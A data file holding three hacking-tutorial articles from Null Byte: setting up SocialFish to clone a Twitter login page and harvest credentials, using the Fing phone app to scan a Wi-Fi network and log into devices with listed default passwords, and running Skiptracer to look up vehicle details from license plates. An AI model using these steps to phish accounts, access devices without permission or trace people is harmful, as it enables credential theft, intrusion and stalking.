title
stringlengths
30
147
content
stringlengths
17
61.4k
How to Phish Social Media Sites with SocialFish Β« Null Byte :: WonderHowTo
Phishing is the easiest way to get your password stolen, as it only takes one mistake to log in to the wrong website. A convincing phishing site is key to a successful attempt, and tools to create them have become intuitive and more sophisticated. SocialFish allows a hacker to create a persuasive phishing page for nearly any website, offering a web interface with an Android app for remote control.In previous guides on phishing, one of the most common questions has been about how easy it would be to adapt the default page to look like a particular login. SocialFish can clone a social media website to create a password-harvesting attack link in only a few clicks, eliminating the need to create such a template yourself. While there is also aprevious version of SocialFishthat featured Ngrok integration, we'll be taking a look atthe new version.Don't Miss:How to Inject Meetings into Anyone's Google CalendarThe Next Generation of SocialFishWhile the previous versions of SocialFish were impressive, the latest update includes a clean web interface to create and manage phishing links. The shift to web-based interfaces for tools likeKismethas helped to make SocialFish more accessible to beginners, and the refined simplicity makes cloning nearly any website incredibly simple.One downside to the new SocialFish is that the documentation is sparse or nonexistent for many features. That means that many of the features like the attached Android application are not simple to use, and troubleshooting can be difficult as the Wiki contains a minimal amount of information.Don't Miss:How to Clone Any Website Using HTTrackStill, as a bleeding-edge tool with a straightforward interface and well-thought-out controls, SocialFish is an easy way to demonstrate how simple customized phishing links are to make. One important note for this article is that, due to the potential for misuse and sketchy documentation, we'll only be deploying this link on our internal network, not to a target on the external internet.What You'll NeedTo use SocialFish, you'll need to have Python3 or higher installed on your computer. You'll also need PIP3, Python3's package manager, installed as well. In addition, several libraries are required for this tool to run. We'll cover installing them in the next steps, but keep in mind this can take quite some time to download and set up over a slow network.Step 1: Download SocialFishTo start using SocialFish, we cancheck out the GitHub repositoryfor information on previous versions and the mobile app that goes with the primary tool. Getting it running requires quite a few dependencies to be installed, so on a good internet connection, we can install everything with a few lines in a terminal window.In a new terminal window, type the following commands to install the necessary dependencies, clone the repository, and run the set-up script.~$ sudo apt-get install python3 python3-pip python3-dev -y ~$ git clone https://github.com/UndeadSec/SocialFish.git ~$ cd SocialFish ~$ python3 -m pip install -r requirements.txtOnce it is finished running, you should be ready to use SocialFish. We'll be using our browser to interact with it, so open a FireFox window before proceeding to the next step.Step 2: Log in to the Web InterfaceNow, let's create a web interface that will help manage our phishing links. To do this, open a terminal window and type the following tochangeinto the SocialFish folder. Pick a username and password to log in to the web interface, and substitute that for the "youruser" and "yourpassword" fields.~$ cd SocialFish ~$ python3 SocialFish.py youruser yourpasswordOnce it's finished setting up, we should be able to access the web interface by navigating to the URL0.0.0.0:5000in our browser. Enter the username and password you set up, and click "Login" to access the SocialFish portal.Step 3: Select the Target to CloneInside the SocialFish portal, we can see some important information. At the top, we see the field for the website we want to clone, the website we want to redirect to, and the URL for our attack.We can also see some information about links we've already created. In my case, I've already created eight attack links, which have attracted 15 clicks and four sets of captured credentials.Step 4: Select the Redirect LinkFor our attack, we'll need to decide what website we want to clone. In this case, we'll picktwitter.com/login. To make things simple, we'll redirect back totwitter.comafterward. If they are already logged in, it will just look like a normal login was successful.Enter the URL you want to clone and the URL you want to redirect to into their respective fields on the top right of the page. Click the lightning bolt to activate the link.Step 5: Deploy the Phishing LinkNow, in a separate browser window, navigate to the attack link β€” the link we would be serving to the victim during a real attack. You will be directed to a real-looking phishing site, and you can enter a username and password to test it.During a live deployment, you would need to redirect the target to this URL. The current documentation is sketchy on this, and I'm also leaving it out as to reduce the risk of malicious use of this script. For now, we can access it on our internal network.Don't Miss:Automating Wi-Fi Hacking with Besside-ngOnce we enter our test credentials, we should be redirected to the link we specified. Now that we've captured some credentials let's explore how SocialFish logs them.Step 6: Analyze the Captured CredentialsBack on the main menu, we can see that the number of captured credentials has gone up. We can also see that listed under "Successful Attacks" are a number of logs we can access.Click "View" on the most recent log to see the credentials we intercepted. It should open a page that dumps the collected information in a format like below.That was easy! With only a couple of clicks, we were able to create a website that looks virtually identical to the real Twitter.com. As soon as we entered our credentials, SocialFish captured them and saved them to an interactive log, allowing us to manage phishing campaigns easily.SocialFish Makes Phishing EasyThough SocialFish has gone through many iterations, it continues to be a powerful tool for creating convincing phishing pages for social media websites. We haven't gone into how to deploy SocialFish across a network in this article, but as you can see in our example, the hardest part of creating a convincing fake on the fly is actually easy to do. One limitation of SocialFish as a tool is its current lack of documentation, but in the future, I expect this to improve to make the companion mobile app more useful.I hope you enjoyed this guide to phishing social media websites! If you have any questions about this tutorial on phishing social media, leave a comment below, and feel free to reach me on [email protected]'t Miss:Easily Generate Hundreds of Phishing DomainsWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo byAlisson Moretto/GitHub; Screenshots by Kody/Null ByteRelatedHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackNews:'Impossible to Identify' Website Phishing Attack Leaves Chrome & Firefox Users Vulnerable (But You Can Prevent It)How To:This LastPass Phishing Hack Can Steal All Your Passwordsβ€”Here's How to Prevent ItNews:Why Social Media Is for Women (& the Men Who Want to Date Them)How To:Use Social Engineering to Hack ComputersNews:8 Tips for Creating Strong, Unbreakable PasswordsHack Like a Pro:The Ultimate Social Engineering HackNews:White House Hacked by Russian Hackers!News:What Is Social Media Day?How To:Phish for Social Media & Other Account Passwords with BlackEyeHow To:Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & MoreSocial Engineering, Part 2:Hacking a Friend's Facebook PasswordHow To:Advanced Social Engineering, Part 1: Exact Revenge on Craigslist Scammers with Tabnab PhishingNews:Flaw in Facebook & Google Allows Phishing, Spam & MoreHow To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitNews:Google Acquires Group Social Networking Site FridgeRevealed:Hundreds of words to avoid using onlineNews:Delitos informaticos. Phishing, en 3 minutos.How To:Use Social Bookmarking Sites For Effective SEOHow To:Use Social Bookmarking Sites For Effective SEONews:Are you Using the Power of Social MediaHow To:Find Jobs Through Social Networks SitesNews:What Social Network Should You Use? Use the Social Network Decision Tree!News:Introduction to Link BuildingNews:When Foursquare Gets CreepyBoo Box Challenge:Wheel in the Sky
How to Map Networks & Connect to Discovered Devices Using Your Phone Β« Null Byte :: WonderHowTo
Sharing your Wi-Fi password is like giving an unlimited pass to snoop around your network, allowing direct access even to LAN-connected devices like printers, routers, and security cameras. Most networks allow users to scan and attempt to log in to these connected devices. And if you haven't changed the default password on these devices, an attacker can simply try plugging them in.Networks scanners arerecon toolsfor finding vulnerabilities and are often seen as the first stage in an attack. While primarily an information gathering tool, theFing network scanneractually allows us to connect directly to a wide range of devices by guessing the password. In an advanced attack, Fing can be used to rapidly obtain targeting information to guide powerful,Hydra passwordcracking attempts.Don't Miss:The Principles & Technologies Needed for Cracking PasswordsScanning a network with Fing can lead to many exciting discoveries because often the people who set up the network do so in ways that don't make any sense. In some setups, the "Guest" Wi-Fi network can even show you a page with the password to the second "Secure" Wi-Fi network in plain text, just by navigating to the router's IP address.Sure, there are many fancier setups for exploiting access, but when physical access is limited, flexibly using your existing tools can be a lifesaver.The essential things that Fing accomplishes are:Mapping a network by discovering all devices connected to it.Scanning discovered devices for OS information and open ports.Connecting directly to devices on the network with open ports by guessing or cracking the default password.The first two bullets above provide the information to support an educated attempt to own devices on a network, or for targeting the router with a more advanced attack against the device, such asRoutersploit. If you're interested in stumbling into security cameras, printer servers, wireless routers, and other random devices you'll find on networks, read on to learn what you need.Don't Miss:Exploit Routers on an Unrooted Android Phone with RoutersploitSystem Compatibility & RequirementsIn this use-case, we will use the disclosure of a Wi-Fi password to quickly scan and fingerprint the network, identify and fingerprint a machine with an open HTTP port, and guess the model-specific default username and password to log in to the device. To do this, you will need any current iPhone or Android device.While you can access any device with HTTP ports like 80 or 8080 open on your phone's browser, you will need an app to open SSH, FTP, and Telnet connections. Today, we will talk about HTTP, but I recommendJuice SSH, for connecting to other ports on Android, orShelly, for use on the iPhone.Using the Fing mobile app to explore new networks (1), to create list of devices to probe (2), and to scan an individual device (3).Images by SADMIN/Null ByteStep 1: Install Fing on iOS or Android PhoneThere are many network scanners for Windows, macOS, and Linux, but the best tool to use is often the one you know you'll have with you. Anything too big, specialized, or expensive you'll probably have left at home when you really need it.That's why we're using the Fing mobile app here. When you have a moment of access to a target, or when you're given a Wi-Fi password unexpectedly, it can be trivial to gain access to many devices on a network with only a smartphone.Fing works on bothAndroidandiPhoneand allows anyone to get started with mapping a network and connecting to devices on it. So use those links to install it on your device, and once you've connected to a Wi-Fi network, Fing will scan the entire network and give a detailed breakdown of each device connected to it.Play Store Link:Fing - Network Tools(free)App Store Link:Fing - Network Scanner(free)Step 2: Join the Wi-Fi Network on Your PhonePolitely ask for the Wi-Fi password of the network you want to scan. It's rare nowadays for someone not to give you this information. Once you have it, connect to the network on your smartphone, then launch the Fing app you just installed.Fing can't scan a network it hasn't joined. For recon on networks you don't have the password to, check outour article on Wardriving.Don't Miss:Wardrive on an Android Phone to Map Vulnerable NetworksStep 3: Scan the Entire Wi-Fi NetworkIn the Fing app, start a new network scan by tapping the round arrow icon in the top right to identify all devices on the current network.Fing performs a scan against a range of all potential IP addresses based on the IP of the network you are connected to. While doing so, it compares the information found against device fingerprints and displays the result in an easy to understand graphical display of all attached devices.Look for important devices like routers, servers, and desktop computers.Most public wireless networks will not assign you to an isolated subnet, allowing you to interact with sometimes hundred of devices.Step 4: Port Scan a Targeted DeviceSelecting a specific device allows you to scan it and find open ports. Just tap on the "Scan Services" option to start the scan. It will probably take longer than the main network scan performed in the previous step.Scanning a device can tell you a lot about the services it offers. Below, we see a scan of aRaspberry Piwith SSH and a web server with port 80 enabled. Ports 22, 80, and 443 are open.Scan of a Raspberry Pi computer. Of course, using default passwords.Any port you find open means an opportunity to probe further into the device. Once you see a device with port 80, 8080, or 443 open,you can tap on itto open it in your browser.Good Beginner Pi Setup:CanaKit Raspberry Pi 3 B+ Starter Kitβ€” $80Step 5: Identify the DeviceLogin pages, combined with the information from our Fing scan, can give detailed information on the device manufacturer and often the model number. If you've ever run an "advanced" Google search, you know this is a bad idea, since you can just look up the default password (which we'll talk about in the next step).Don't Miss:How to Find Vulnerable Targets Using the Shodan Search EngineIn one of my scans, I found an Arris router. On its login page, the default username is quickly shown (as "admin"). Plus, the "HSD" tab shows us the model number and even serial number.Device configuration pages often give away way too much information, as this Arris router helpfully provides us the default username.Step 6: Find the Default Username & Password for the DeviceA simple Google search will give you the default credentials for that particular model. Enter the default username and password to test if the device has been properly configured. It probably hasn't.Unless your device is one specific model of router, odds are the password is password. Creative thinking, Arris!By far the most common logins across all devices are:Username:root, admin, user, and super.Password:password, (blank), toor, super, admin, user, and root.Some Warnings on FingingOne thing you'll learn about life is not everyone likes being Finged. Some organizations with IT departments or IDS systems can get quite upset about being Finged by surprise and without permission. As a result, it's wise to not go around Finging every open port if you don't know who might get upset about it, just as in life in general.In particular, counter-cybercrime training provided to technology companies by the US government targets employees for heightened scrutiny and potential reporting to federal agencies if they become concerned about your behavior on company networks. Port scanning company networks is seen as suspicious and indicative of either espionage or crime. If you work at a company like this, and you're using your phone, keep your Fingers to yourself at work.Accessing a device without permission is a crime, so while you may have permission to use the internet, "using" typically does not cover logging into the router and changing settings. Like any port scan, Fing will leave traces in the router logs and may trigger a firewall or IDS to block you.You can ask me questions here or @sadmin2001 onTwitterorInstagram.Don't Miss:How to Create Stronger Passwords (Advice from a Real Hacker)Follow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by SADMIN/Null ByteRelatedHow To:Tactical Nmap for Beginner Network ReconnaissanceHow To:Find & Share Local Wi-Fi Passwords for Free Internet Everywhere You GoHow To:Spy on Network Relationships with Airgraph-NgHow To:Automatically Connect to Free Wi-Fi Hotspots (That Are Actually Free) on Your Samsung Galaxy Note 2How To:The Beginner's Guide to Defending Against Wi-Fi HackingHow To:Wardrive on an Android Phone to Map Vulnerable NetworksHow To:Connect to Protected Wi-Fi Hotspots for Free Without Any PasswordsHow To:Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunterHow To:Protect Yourself from the KRACK Attacks WPA2 Wi-Fi VulnerabilityHow To:Hack a Hard Drive into a Hidden Flash Drive, Cell Phone Charger & More!How To:Use & Abuse the Address Resolution Protocol (ARP) to Locate Hosts on a NetworkAndroid Basics:How to Connect to a Wi-Fi NetworkHow To:Prepare Your Phone for a Trip Abroad with These TipsYouTube 101:How to Cast Videos to Your TVHow To:See Who's Clogging Up Your Wi-Fi Network with These Free Mobile AppsHow To:Speed Test Your Chromecast or Android TVHulu 101:How to Cast Shows & Movies to Your TVHow To:Connect Your iPhone to Your Mac Like Never Before with PushbulletHow To:Track Wi-Fi Devices & Connect to Them Using ProbequestHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:Google Maps vs. Google Maps Go β€” Which App Is Right for You?How To:Hack Open Hotel, Airplane & Coffee Shop Wi-Fi with MAC Address SpoofingHow To:Having Connection Issues on Android Pie? Turn Off 'Turn on Wi-Fi Automatically'How To:Connect to a nearby WiFi network on a BlackBerry Pearl 3G phoneHow To:Force Your iPhone to Switch Cell Towers for a Stronger SignalHow To:Sync Your Galaxy S3's Music with Any Android Device Without Using Group PlayHow To:Play Your Favorite Xbox One Games on iPhone or AndroidHow To:Use an ESP8266 Beacon Spammer to Track Smartphone UsersHow To:Download Entire Maps for Offline Use in Google MapsHow To:Log Wi-Fi Probe Requests from Smartphones & Laptops with ProbemonHow To:Fix Google Now Bluetooth Problems on Your Samsung Galaxy Note 2 or Other Android DeviceHow To:USB Tether Your Android Device to Your Macβ€”Without RootingHow To:Easily Share Your Wi-Fi Password with a QR Code on Your Android PhoneHow To:Use Kismet to Watch Wi-Fi User Activity Through WallsHow To:Save Battery Life & Never Get Lost Again with Offline Maps & Directions on Your Samsung Galaxy S3How To:Use Google Maps to Share Your Location with Friends & FamilyNews:Nextdoor Brings Private Social Networks to a Neighborhood Near YouHow To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android DeviceHow To:Bypass a Local Network Proxy for Free InternetSUBMIT:Self Portrait Cell Phone Photo by January 16th. WIN: Portable USB Power Supply
How to Find OSINT Data on License Plate Numbers with Skiptracer Β« Null Byte :: WonderHowTo
While conducting an OSINT investigation, it's important to be able to pull in information based on any clue you uncover. In particular, license plate information can turn up everywhere, from photos to live data to on your own street. You could use that data to find the VIN, see if a Tinder date has hit anyone, find out who's blocking your driveway, and so on. Skiptracer can help get the ball rolling.To get started, you'll need to have Python 2 installed and updated on your system. The developer of Skiptracer, xillwillx, is in the process of updating the tool to Python 3 since Python 2 is no longer supported, but it's not entirely done yet, so Python 2 is what we'll need for now. To see if you have Python 2 installed, use:~$ python 2 --version Python 2.7.18Python 2.7.18 is the latest version, so you're good if that's what comes up. If you don't have it yet, install or update it using:~$ sudo apt install python2 [sudo] password for kali: Reading package lists... Done Building dependency tree Reading state information... Done python2 is already the newest version (2.7.17-2). python2 set to manually installed. 0 upgraded, 0 newly installed, 0 to remove and 122 not upgraded.Now, once you have the U.S. license plate number and state of the vehicle you want to conduct an OSINT investigation on, you could start plugging the data into websites online. Still, most of them will try and charge you hefty fees to access any information. That's why Skiptracer is an excellent tool to use, as it queries a bunch of APIs to see if it can find free information from the best sources that are available.Don't Miss:Find Identifying Info from a Phone Number Using OSINT ToolsNow, to get started with Skiptracer, after knowing you already have Python 2 installed and up to date, you'll need to download the tool fromxillwillx's GitHub. It's pretty easy to install since you just need to clone the repository with:~$ git clone https://github.com/xillwillx/skiptracer.git loning into 'skiptracer'... remote: Enumerating objects: 3, done. remote: Counting objects: 100% (3/3), done. remote: Compressing objects: 100% (3/3), done. remote: Total 1098 (delta 0), reused 0 (delta 0), pack-reused 1095 Receiving objects: 100% (1098/1098), 388.83 KiB | 1.85 MiB/s, done. Resolving deltas: 100% (654/654), done.To see what's inside the repository downloaded, you cancdintoskiptracer, thenlsto list its files.~$ cd skiptracer ~/skiptracer$ ls Changelog Dockerfile LICENSE plugins README.md requirements.txt skiptracer.py storageIf you've ever installed a Python program before, it may be fairly obvious what needs to happen next. For those of you who haven't or don't know, you'll need to install the requirements.text file, which is a list of all the different modules Skiptracer needs to work. Use thepip install -rcommand to install it.~/skiptracer$ pip install -r requirements.txt Collecting python-docx Downloading python-docx-0.8.10.tar.gz (5.5 MB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 5.5 MB 880 kB/s Requirement already satisfied: urllib3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (1.25.8) Collecting bs4 Downloading bs4-0.0.1.tar.gz (1.1 kB) Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (4.5.0) Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 5)) (2.23.0) Collecting ipdb Downloading ipdb-0.13.2.tar.gz (14 kB) Collecting pprint Downloading pprint-0.1.tar.gz (860 bytes) Requirement already satisfied: click in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (7.0) Collecting cfscrape Downloading cfscrape-2.1.1-py3-none-any.whl (12 kB) Requirement already satisfied: numpy in /usr/lib/python3/dist-packages (from -r requirements.txt (line 10)) (1.17.4) Requirement already satisfied: simplejson in /usr/lib/python3/dist-packages (from -r requirements.txt (line 11)) (3.17.0) Requirement already satisfied: tqdm in /usr/lib/python3/dist-packages (from -r requirements.txt (line 12)) (4.43.0) Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4->-r requirements.txt (line 3)) (4.9.0) Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from ipdb->-r requirements.txt (line 6)) (46.1.3) Requirement already satisfied: ipython>=5.1.0 in /usr/lib/python3/dist-packages (from ipdb->-r requirements.txt (line 6)) (7.13.0) Requirement already satisfied: pexpect in /usr/lib/python3/dist-packages (from ipython>=5.1.0->ipdb->-r requirements.txt (line 6)) (4.6.0) Building wheels for collected packages: python-docx, bs4, ipdb, pprint Building wheel for python-docx (setup.py) ... done Created wheel for python-docx: filename=python_docx-0.8.10-py3-none-any.whl size=184489 sha256=32c641b12abc6ff6aee1d56a517a41bfef0f0141f16b8a56959a17e160b6eae1 Stored in directory: /home/kali/.cache/pip/wheels/97/4c/2e/68066cbf12b9b2e66403da8982aaf4f656d9f5cb5dc3179e82 Building wheel for bs4 (setup.py) ... done Created wheel for bs4: filename=bs4-0.0.1-py3-none-any.whl size=1272 sha256=38acc084f674266787666f8155ea215bcb5b396e0c10abda215e7eb6c2606b01 Stored in directory: /home/kali/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca Building wheel for ipdb (setup.py) ... done Created wheel for ipdb: filename=ipdb-0.13.2-py3-none-any.whl size=10520 sha256=80973c70adb010a911087952c8eb2b65df2c2c39200d55bf5142fcc4bd5809c1 Stored in directory: /home/kali/.cache/pip/wheels/31/f3/58/accdf45cba573136dff3bc0e8aad1848899255f5fc3266a9fc Building wheel for pprint (setup.py) ... done Created wheel for pprint: filename=pprint-0.1-py3-none-any.whl size=1250 sha256=d925426ad1cb6c7b20b03248fcacffb846477c9b4fa4939417a14b651a65cf2e Stored in directory: /home/kali/.cache/pip/wheels/db/43/1c/d58ea998a94cba18fba3d83fb3f574dcefe66b825f039cd932 Successfully built python-docx bs4 ipdb pprint Installing collected packages: python-docx, bs4, ipdb, pprint, cfscrape Successfully installed bs4-0.0.1 cfscrape-2.1.1 ipdb-0.13.2 pprint-0.1 python-docx-0.8.10Then, we'll run the actualskiptracer.pyfile. When we run it, we should see an awesome banner and a list of different things we can do.~/skiptracer$ python skiptracer.py .β–„β–„ Β· β–„ β€’β–„ β–ͺ β–„β–„β–„Β·β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„Β· β–„β–„Β· β–„β–„β–„ .β–„β–„β–„ β–β–ˆ β–€. β–ˆβ–Œβ–„β–Œβ–ͺβ–ˆβ–ˆ β–β–ˆ β–„β–ˆβ€’β–ˆβ–ˆ β–€β–„ β–ˆΒ·β–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–€β–„.β–€Β·β–€β–„ β–ˆΒ· β–„β–€β–€β–€β–ˆβ–„β–β–€β–€β–„Β·β–β–ˆΒ· β–ˆβ–ˆβ–€Β· β–β–ˆ.β–ͺ▐▀▀▄ β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ ▄▄▐▀▀β–ͺ▄▐▀▀▄ β–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆ.β–ˆβ–Œβ–β–ˆβ–Œβ–β–ˆβ–ͺΒ·β€’ β–β–ˆβ–ŒΒ·β–β–ˆβ€’β–ˆβ–Œβ–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–„β–„β–Œβ–β–ˆβ€’β–ˆβ–Œ ,.-~*´¨¯¨`*Β·~-.ΒΈ-(by)-,.-~*´¨¯¨`*Β·~-.ΒΈ β–€ β–ˆ β–ˆ β–ˆβ–€β–„β–€β–ˆ β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€β–„ β–ˆ β–ˆ β–ˆ β–ˆ β–€ β–ˆ β–ˆ β–ˆ β–ˆβ–€β–€β–„ β–€ β–€ β–€ β–€ β–€ β–€β–€β–€β–€ β–€β–€β–€ https://illmob.org .β–„β–„ Β· β–„ β€’β–„ β–ͺ β–„β–„β–„Β·β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„Β· β–„β–„Β· β–„β–„β–„ .β–„β–„β–„ β–β–ˆ β–€. β–ˆβ–Œβ–„β–Œβ–ͺβ–ˆβ–ˆ β–β–ˆ β–„β–ˆβ€’β–ˆβ–ˆ β–€β–„ β–ˆΒ·β–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–€β–„.β–€Β·β–€β–„ β–ˆΒ· β–„β–€β–€β–€β–ˆβ–„β–β–€β–€β–„Β·β–β–ˆΒ· β–ˆβ–ˆβ–€Β· β–β–ˆ.β–ͺ▐▀▀▄ β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ ▄▄▐▀▀β–ͺ▄▐▀▀▄ β–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆ.β–ˆβ–Œβ–β–ˆβ–Œβ–β–ˆβ–ͺΒ·β€’ β–β–ˆβ–ŒΒ·β–β–ˆβ€’β–ˆβ–Œβ–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–„β–„β–Œβ–β–ˆβ€’β–ˆβ–Œ ,.-~*´¨¯¨`*Β·~-.ΒΈ-(by)-,.-~*´¨¯¨`*Β·~-.ΒΈ β–€ β–ˆ β–ˆ β–ˆβ–€β–„β–€β–ˆ β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€β–„ β–ˆ β–ˆ β–ˆ β–ˆ β–€ β–ˆ β–ˆ β–ˆ β–ˆβ–€β–€β–„ β–€ β–€ β–€ β–€ β–€ β–€β–€β–€β–€ β–€β–€β–€ https://illmob.org [!] Lookup menu: [1] Email - Search targets by email address [2] Name - Search targets by First Last name combination [3] Phone - Search targets by telephone number [4] ScreenName - Search targets by known alias [5] Plate - Search targets by license plate [6] Domain - Search targets by Domain [7] Help - Details the application and use cases [88] Report - Generates a docx report from queries [99] Exit - Terminate the application [!] Select a number to continue:The most obvious choice here is "plate." A lot of the other options you see are in other tools, such asSherlock("ScreenName"), but we're just focusing on the plate search. Go ahead and select number 5 to do so.Don't Miss:Top 10 Browser Extensions for Hackers & OSINT Researchers[!] Select a number to continue: 5 .β–„β–„ Β· β–„ β€’β–„ β–ͺ β–„β–„β–„Β·β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„Β· β–„β–„Β· β–„β–„β–„ .β–„β–„β–„ β–β–ˆ β–€. β–ˆβ–Œβ–„β–Œβ–ͺβ–ˆβ–ˆ β–β–ˆ β–„β–ˆβ€’β–ˆβ–ˆ β–€β–„ β–ˆΒ·β–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–€β–„.β–€Β·β–€β–„ β–ˆΒ· β–„β–€β–€β–€β–ˆβ–„β–β–€β–€β–„Β·β–β–ˆΒ· β–ˆβ–ˆβ–€Β· β–β–ˆ.β–ͺ▐▀▀▄ β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ ▄▄▐▀▀β–ͺ▄▐▀▀▄ β–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆ.β–ˆβ–Œβ–β–ˆβ–Œβ–β–ˆβ–ͺΒ·β€’ β–β–ˆβ–ŒΒ·β–β–ˆβ€’β–ˆβ–Œβ–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–„β–„β–Œβ–β–ˆβ€’β–ˆβ–Œ ,.-~*´¨¯¨`*Β·~-.ΒΈ-(by)-,.-~*´¨¯¨`*Β·~-.ΒΈ β–€ β–ˆ β–ˆ β–ˆβ–€β–„β–€β–ˆ β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€β–„ β–ˆ β–ˆ β–ˆ β–ˆ β–€ β–ˆ β–ˆ β–ˆ β–ˆβ–€β–€β–„ β–€ β–€ β–€ β–€ β–€ β–€β–€β–€β–€ β–€β–€β–€ https://illmob.org [!] ScreenName search menu: Target info - None [1] All - Run all modules associated to the email module group [2] Plate Search - Run known vehicle plates against a database [3] Reset Target - Reset the Phone to new target address [4] Back - Return to main menu [!] Select a number to continue:Now, let's select number 2 for "Plate Search." After doing so, it will ask you for the plate number, so enter that in at this time.[!] Select a number to continue: 2 [?] Whats the target's plate number? [ex: (XYZ123|0U812)]: 5FZXXXXAfter entering that, it'll ask you for the U.S. license plate's state abbreviation.[?] FaxVin [!] Please enter 2 letter abbreviated state - ex: (AL=Alabama|CO=Colorado) CA [X] No results were found ...If everything went well, you should see results. If you get the "No results" warning as I did, pressEnterto continue, then select number 1 for "All." It's for all modules associated to the email module group, which doesn't make sense, I know, but it works. Then, reenter the state ID.[!] ScreenName search menu: Target info - 5FZXXXX [1] All - Run all modules associated to the email module group [2] Plate Search - Run known vehicle plates against a database [3] Reset Target - Reset the Phone to new target address [4] Back - Return to main menu [!] Select a number to continue: 1 [?] FaxVin [!] Please enter 2 letter abbreviated state - ex: (AL=Alabama|CO=Colorado) CA [+] Plate: 5FZXXXX [+] State: CA [+] VIN: WDBUF70JX4A4XXXXX [+] Make: Mercedes-Benz [+] Model: E-Class [+] Year: 2004 [+] Trim: E500 [+] Style: SEDAN 4-DR [+] Engine: 5.0L V8 SOHC 24V [+] Plant: Sindelfingen, Germany [+] Age: 16 year(s) Press 'ENTER' key now to continueFrom that, we were able to extract some information about the vehicle. We started with just the plate number, but now we have the automobile's VIN, which we can use to pull up all sorts of other information. That data could include when it was registered and who it was registered to. If you're an OSINT investigator, you know that the more clues you can get about a specific target, the easier it is to plug it into other sources and learn a little bit more, bit by bit.If you're looking for other information, there are other useful modules included in Skiptracer. For example, if you have a specific screen name you're looking for, it's easy to use the ScreenName module and run it against "All." It'll do the work for you, looking for accounts online that use that screen name. So if you need to do a quick profile on someone, or if you have a U.S. license plate to scan, either one of these modules will work just fine.Skiptracer isn't a complete solution for an OSINT investigation, but it's a great way to start pulling clues together quickly, provided you have Python 2 installed on your system. If you need further help with Skiptracer, hit up the comments below or ask on [email protected]'t Miss:How to Hunt Down Social Media Accounts by Usernames with SherlockWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image via Retia/Null Byte (originally byMarcus P./Unsplash)RelatedHow To:Find Identifying Information from a Phone Number Using OSINT ToolsHow To:Use the Buscador OSINT VM for Conducting Online InvestigationsVideo:How to Use Maltego to Research & Mine Data Like an AnalystHow To:Message Other Drivers on the Road Using Just Their License PlateHow To:Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party BreachesHow To:Scrape Target Email Addresses with TheHarvesterRecon:How to Research a Person or Organization Using the Operative FrameworkHow To:Spot Fake Businesses & Find the Signature of CEOs with OSINTHow To:Mine Twitter for Targeted Information with TwintHow To:Use Photon Scanner to Scrape Web OSINT DataHow To:5 Incredibly Cheap and Smooth DIY Camera Mounts for Inside or Outside of Your CarHow To:Use Maltego to Fingerprint an Entire Network Using Only a Domain NameSkip the Long DMV Line:Renew Your Driver's License at a AAA Office Instead (No Membership 